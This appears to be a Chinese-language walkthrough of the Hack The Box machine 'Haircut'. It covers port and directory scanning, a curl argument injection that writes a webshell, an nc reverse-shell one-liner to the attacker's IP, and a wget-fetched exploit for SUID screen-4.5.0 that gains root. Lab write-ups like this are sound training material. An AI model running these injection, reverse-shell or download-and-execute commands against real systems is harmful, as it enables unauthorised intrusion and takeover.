基本信息

端口扫描

22和80:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
$ nmap -sC -sV 10.10.10.24
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-09 13:55 CST
Nmap scan report for 10.10.10.24
Host is up (0.067s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 e9:75:c1:e4:b3:63:3c:93:f2:c6:18:08:36:48:ce:36 (RSA)
|   256 87:00:ab:a9:8f:6f:4b:ba:fb:c6:7a:55:a8:60:b2:68 (ECDSA)
|_  256 b6:1b:5c:a9:26:5c:dc:61:b7:75:90:6c:88:51:6e:54 (ED25519)
80/tcp open  http    nginx 1.10.0 (Ubuntu)
|_http-server-header: nginx/1.10.0 (Ubuntu)
|_http-title:  HTB Hairdresser
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.92 seconds

80

就一张图:

目录扫描

扫目录可以发现uploads和exposed.php:

1
2
3
4
5
6
7
gobuster dir -u http://10.10.10.24/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt -t 100

/index.html (Status: 200)
/uploads (Status: 301)
/test.html (Status: 200)
/hair.html (Status: 200)
/exposed.php (Status: 200)

exposed.php

这个是直接通过curl进行check的:

webshell

那就可以直接通过curl命令注入添加参数写webshell,前面也看到有uploads目录:

1
http://10.10.14.12:7777/shell.php -o uploads/shell.php

user flag

1
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.12 4444 >/tmp/f

shell是www-data用户,但已经可以直接去读maria用户桌面的user.txt了:

提权信息

查看suid文件可以发现screen-4.5.0,存在已知漏洞:

提权 && root flag

exp一键:

1
2
3
4
python3 -c 'import pty; pty.spawn("/bin/bash")'
wget http://10.10.14.12:7777/exp.sh
chmod +x exp.sh
./exp.sh

参考资料